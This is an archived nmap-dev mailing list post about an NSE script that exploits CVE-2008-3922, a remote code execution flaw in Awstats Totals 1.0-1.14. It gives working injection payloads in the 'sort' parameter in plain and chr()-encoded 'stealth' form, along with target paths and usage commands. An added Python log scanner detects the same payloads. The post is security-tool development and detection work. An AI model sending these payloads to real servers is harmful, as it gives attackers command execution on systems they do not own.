Nmap Development mailing list archives
Re: http-awstatstotals-exec - Remote code execution exploit for Awstats totals 1.0-1.14
From: Paulino Calderon <paulino () calderonpale com>
Date: Fri, 15 Jul 2011 18:32:12 -0700
On 07/11/2011 02:43 AM, Paulino Calderon wrote:
Hi nmap-dev,

description = [[
http-awstatstotals-exec exploits a remote code execution vulnerability in Awstats Totals 1.0 up to 1.14 and possibly other products based on it. It works on PHP4 and PHP5 with magic quotes enabled. [CVE: 2008-3922]

Stealth mode encodes the command string using PHP's chr() function. Ex.

* Normal mode:
<code>?sort={%24{passthru%28$_GET[CMD]%29}}{%24{exit%28%29}}&CMD=uname%20-a</code>
* Stealth mode:
<code>?sort={%24{passthru%28chr(117).chr(110).chr(97).chr(109).chr(101).chr(32).chr(45).chr(97)%29}}{%24{exit%28%29}}</code>

Common paths for Awstats Total:
* /awstats/index.php
* /awstatstotals/index.php
* /awstats/awstatstotals.php
]]

---
-- @usage
-- nmap --script http-awstatstotals-exec.nse --script-args 'http-awstatstotals-exec.cmd="uname -a", http-awstatstotals-exec.stealth, http-awstatstotals-exec.uri=/awstats/index.php' -p80 <host/ip>
--
-- @output
-- PORT   STATE SERVICE REASON
-- 80/tcp open  http    syn-ack
-- |_http-awstatstotals-exec.nse: Linux 2.4.19 #1 Son Apr 14 09:53:28 CEST 2002 i686 GNU/Linux
--
-- @args http-awstatstotals-exec.uri Awstats Totals URI including path
-- @args http-awstatstotals-exec.cmd Command to execute
-- @args http-awstatstotals-exec.stealth Stealth mode encodes command payload using PHP's chr()
-- @args http-awstatstotals-exec.outfile Output file
---

_______________________________________________
Sent through the nmap-dev mailing list
http://cgi.insecure.org/mailman/listinfo/nmap-dev
Archived at http://seclists.org/nmap-dev/
This update uses PHP's chr() encoding as default.

Toni: Thanks for the suggestion. I'll update the output before committing. I want to get some feedback beforehand regarding how the script should behave, since the only way to make sure an installation is vulnerable is by exploiting it and checking.
description = [[
http-awstatstotals-exec exploits a remote code execution vulnerability in Awstats Totals 1.0 up to 1.14 and possibly other products based on it. [CVE: 2008-3922]

This vulnerability can be exploited through the GET variable sort. The script queries the web server with the command payload encoded using PHP's chr() function:

<code>?sort={%24{passthru%28chr(117).chr(110).chr(97).chr(109).chr(101).chr(32).chr(45).chr(97)%29}}{%24{exit%28%29}}</code>

Common paths for Awstats Total:
* <code>/awstats/index.php</code>
* <code>/awstatstotals/index.php</code>
* <code>/awstats/awstatstotals.php</code>

References:
* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3922
* http://www.exploit-db.com/exploits/17324/
]]

---
-- @usage
-- nmap --script http-awstatstotals-exec.nse --script-args 'http-awstatstotals-exec.cmd="uname -a", http-awstatstotals-exec.uri=/awstats/index.php' -p80 <host/ip>
-- nmap --script http-awstatstotals-exec.nse -p80 <host/ip>
--
-- @output
-- PORT   STATE SERVICE REASON
-- 80/tcp open  http    syn-ack
-- |_http-awstatstotals-exec.nse: Linux 2.4.19 #1 Son Apr 14 09:53:28 CEST 2002 i686 GNU/Linux
--
-- @args http-awstatstotals-exec.uri Awstats Totals URI including path
-- @args http-awstatstotals-exec.cmd Command to execute
-- @args http-awstatstotals-exec.outfile Output file
---
--
-- Other useful args when running this script:
-- http.useragent - User Agent to use in GET request
--

Paulino Calderón Pale
Web: http://calderonpale.com
Twitter: http://www.twitter.com/paulinocaIderon
Attachment:
http-awstatstotals-exec.nse
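The sort-parameter injection described in the thread, seen from the defender's side. This is an added example, not part of the thread or of the NSE script: it scans constructed Apache combined-format access-log lines for the curly-brace payload in the sort variable on the Awstats Totals paths the description lists, decoding percent-encoding first so that the chr()-encoded form and the normal-mode form are caught the same way. The log lines, IPs and timestamps are constructed; the detection regex and the helper names are assumptions of this example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed Apache combined-format access-log lines for this example (not real traffic).
# Line 2 carries the chr()-encoded payload, line 3 a fully percent-encoded normal-mode payload.
SAMPLE_LOG = """\
10.0.0.5 - - [15/Jul/2011:18:32:12 -0700] "GET /awstats/index.php?sort=unique HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [15/Jul/2011:18:33:01 -0700] "GET /awstats/index.php?sort={%24{passthru%28chr(117).chr(110).chr(97).chr(109).chr(101)%29}}{%24{exit%28%29}} HTTP/1.1" 200 211 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; http://nmap.org/book/nse.html)"
10.0.0.9 - - [15/Jul/2011:18:33:02 -0700] "GET /awstatstotals/index.php?sort=%7B%24%7Bpassthru%28%24_GET%5BCMD%5D%29%7D%7D&CMD=id HTTP/1.1" 200 40 "-" "curl/7.21"
10.0.0.7 - - [15/Jul/2011:18:35:00 -0700] "GET /awstats/awstatstotals.php?sort=bandwidth&year=2011 HTTP/1.1" 200 4711 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+)[^"]*" (?P<status>\d+)')

# Structural signal: PHP curly-brace interpolation '{${' opening a code block inside the
# sort value. Function names are secondary (the thread shows passthru and chr). Matching on
# the decoded value makes the chr()-encoded and the normal-mode payload look identical.
INJECT_RE = re.compile(r'\{\s*\$\s*\{|\b(?:passthru|chr)\s*\(', re.I)

# Paths the thread lists as common Awstats Totals locations.
AWSTATS_PATHS = ('/awstats/index.php', '/awstatstotals/index.php', '/awstats/awstatstotals.php')

def parse_line(line):
    """Split one combined-log line into client IP, path, decoded query parameters and status."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group('target'))
    return {'ip': m.group('ip'), 'path': url.path, 'status': int(m.group('status')),
            'params': parse_qs(url.query, keep_blank_values=True)}

def sort_injection(value):
    """True if a sort value (decoded once by parse_qs, or still raw) carries the pattern."""
    decoded = unquote(value)  # second decode pass also catches double-encoded payloads
    return INJECT_RE.search(decoded) is not None

def find_awstats_injections(log_text):
    """Return (ip, path, decoded sort value) for each request to an Awstats Totals path whose
    sort parameter carries the injection. The User-Agent is deliberately ignored: the
    script's http.useragent argument makes it trivial to change."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec['path'] not in AWSTATS_PATHS:
            continue
        for v in rec['params'].get('sort', []):
            if sort_injection(v):
                hits.append((rec['ip'], rec['path'], unquote(v)))
                break
    return hits
```

Running find_awstats_injections over the sample flags the two requests from 10.0.0.9 and leaves the ordinary sort=unique and sort=bandwidth requests alone.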
Current thread:
- http-awstatstotals-exec - Remote code execution exploit for Awstats totals 1.0-1.14 Paulino Calderon (Jul 11)
- Re: http-awstatstotals-exec - Remote code execution exploit for Awstats totals 1.0-1.14 Toni Ruottu (Jul 11)
- Re: http-awstatstotals-exec - Remote code execution exploit for Awstats totals 1.0-1.14 Paulino Calderon (Jul 15)